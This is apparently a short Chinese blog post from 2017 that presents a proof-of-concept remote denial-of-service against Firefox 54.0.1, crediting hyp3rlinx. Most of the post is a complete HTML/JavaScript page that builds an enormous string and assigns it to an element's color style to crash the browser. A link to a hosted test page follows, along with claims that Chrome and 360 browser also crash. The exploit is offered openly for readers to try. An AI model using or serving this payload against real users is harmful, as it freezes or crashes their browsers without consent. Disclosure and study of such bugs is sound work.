最新版火狐远程DoS漏洞,亲测成功
2017-07-10 本文已影响0人
流弊的小白
火狐浏览器Firefox 54.0.1(最新版)远程DoS漏洞
问题出在某些标签的超长样式及颜色属性字符串。
POC如下:
<html>
<body>
<script>
//Windows 7 x64
//FireFox v53.0.3 (32-bit) Crashes
//Credits: John Page / hyp3rlinx
//ISR: ApparitionSec
//hyp3rlinx.altervista.org
var p1 = "\x41";
for (var c=0;c<0xC350;c++){
p1+="\x41";
}
var p2="\x41";
for (c=0;c<0x1388;c++){
p2 += p1;
}
var el = document.createElement('FORM') //IMG,FORM,DIV,P,A,H2,IFRAME,TABLE,TEXTAREA
el.style.color=p2
document.body.appendChild(el)
</script>
</body>
</html>
Firefox奔溃就不截图了.........因为卡死了
想直接测试的可点击下面的链接:
https://bug1376692.bmoattachments.org/attachment.cgi?id=8881644
Google Chrome奔溃
360奔溃
相关链接如下
https://bugzilla.mozilla.org/show_bug.cgi?id=1376692#a465096_417288
